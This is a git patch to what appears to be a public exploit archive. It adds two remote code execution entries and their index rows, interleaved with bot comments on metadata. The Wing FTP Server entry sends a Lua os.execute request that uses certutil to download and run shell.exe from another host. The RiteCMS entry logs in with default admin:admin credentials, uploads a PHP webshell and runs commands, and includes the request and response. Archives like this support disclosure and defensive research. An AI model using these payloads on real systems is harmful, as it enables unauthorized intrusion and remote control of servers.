From da1d7301afa92fac408daca87741e1580b8f0f38 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 17 Jul 2020 05:02:11 +0000
Subject: [PATCH] DB: 2020-07-17 2 changes to exploits/shellcodes RiteCMS 2.2.1 - Remote Code Execution Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
---
exploits/lua/webapps/48676.txt | 27 +++++++++++++++++++++++
exploits/php/webapps/48675.txt | 40 ++++++++++++++++++++++++++++++++++
files_exploits.csv | 2 ++
3 files changed, 69 insertions(+)
create mode 100644 exploits/lua/webapps/48676.txt
create mode 100644 exploits/php/webapps/48675.txt
diff --git a/exploits/lua/webapps/48676.txt b/exploits/lua/webapps/48676.txt
new file mode 100644
index 000000000..1ef32dc71
--- /dev/null
+++ b/exploits/lua/webapps/48676.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
+# Date: 2020-06-26
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: https://www.wftpserver.com/
+# Software Link: https://www.wftpserver.com/download.htm
+# Version: 6.3.8
+# Tested on: Windows 10
+# CVE : --
+
+Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell.
+
+1) Generate your payload (e.g. msfvenom)
+2) Send and execute via POST
+
+POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
+Host: 192.168.56.105:5466
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.56.105:5466/admin_lua_term.html
+Content-Type: text/plain;charset=UTF-8
+Content-Length: 153
+Connection: close
+Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5
+
+command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
\ No newline at end of file
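Review bot: The description line says the console can be exploited by "authenticated users", but the sample request targets the administrator console (`/admin_lua_.html`) and carries a `UIDADMIN` session cookie, so the required privilege appears to be administrator rather than any logged-in account. The header block should state this explicitly, for example `# Privileges required: administrator session on the web admin console`, because it decides the severity a defender assigns to the entry. The entry names no fixed version or vendor advisory and leaves `# CVE : --` blank; if none exists, `# CVE : N/A` says so more clearly. The session cookie value in the request would be better published as a placeholder such as `UIDADMIN=<session-id>`.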
diff --git a/exploits/php/webapps/48675.txt b/exploits/php/webapps/48675.txt
new file mode 100644
index 000000000..e2329a0a2
--- /dev/null
+++ b/exploits/php/webapps/48675.txt
@@ -0,0 +1,40 @@
+# Exploit Title: RiteCMS 2.2.1 - Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: Enes Özeser
+# Vendor Homepage: http://ritecms.com/
+# Version: 2.2.1
+# Tested on: Linux
+
+1- Go to following url. >> http://(CHANGE-THIS)/ritecms/cms/
+2- Default username and password is admin:admin.
+3- Go "Filemanager" and press "Upload file" button.
+4- Choose your php webshell script and upload it.
+
+((Example PHP Web Shell Code))
+"; system($_GET['cmd']); ?>
+
+5- You can find uploaded file there. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php
+6- We can execute a command now. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php?cmd=whoami
+
+(( REQUEST ))
+
+GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ritecms/cms/index.php?mode=filemanager&directory=media
+Connection: close
+Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
+Upgrade-Insecure-Requests: 1
+
+(( RESPONSE ))
+
+HTTP/1.1 200 OK
+Date: Fri, 03 Jul 2020 21:10:13 GMT
+Server: Apache/2.4.43 (Debian)
+Content-Length: 14
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
www-data
\ No newline at end of file
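Review bot: The title "RiteCMS 2.2.1 - Remote Code Execution" omits that the steps begin with a login to the CMS (step 2, `admin:admin`), whereas the other entry added in this commit is marked "(Authenticated)". For consistency the title here and in the matching `files_exploits.csv` row should read `RiteCMS 2.2.1 - Remote Code Execution (Authenticated)`. The header block also lacks the `# Software Link:` and `# CVE :` fields that the sibling file carries. For readers triaging exposure, the preconditions deserve one explicit line: the result depends on unchanged default credentials and on the file manager accepting `.php` files into the web-served `media/` directory.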
diff --git a/files_exploits.csv b/files_exploits.csv
index 3650ffcef..6de805545 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42922,3 +42922,5 @@ id,file,description,date,author,type,platform,port
 48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
+48675,exploits/php/webapps/48675.txt,"RiteCMS 2.2.1 - Remote Code Execution",2020-07-16,"Enes Özeser",webapps,php,
+48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
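Review bot: The author handle in the new row for 48676 is written `V1n1v131r4`, while the file header added in the same commit has `# Exploit Author: v1n1v131r4`; the two should use one spelling so that author lookups and deduplication match. Both new rows are dated 2020-07-16, which differs from the `# Date:` fields in the files (2020-06-26 and 2020-07-03) and from the commit subject (2020-07-17). Presumably the column holds the publication date, but the visible header row `id,file,description,date,author,type,platform,port` does not say so; that is worth documenting once, outside the CSV.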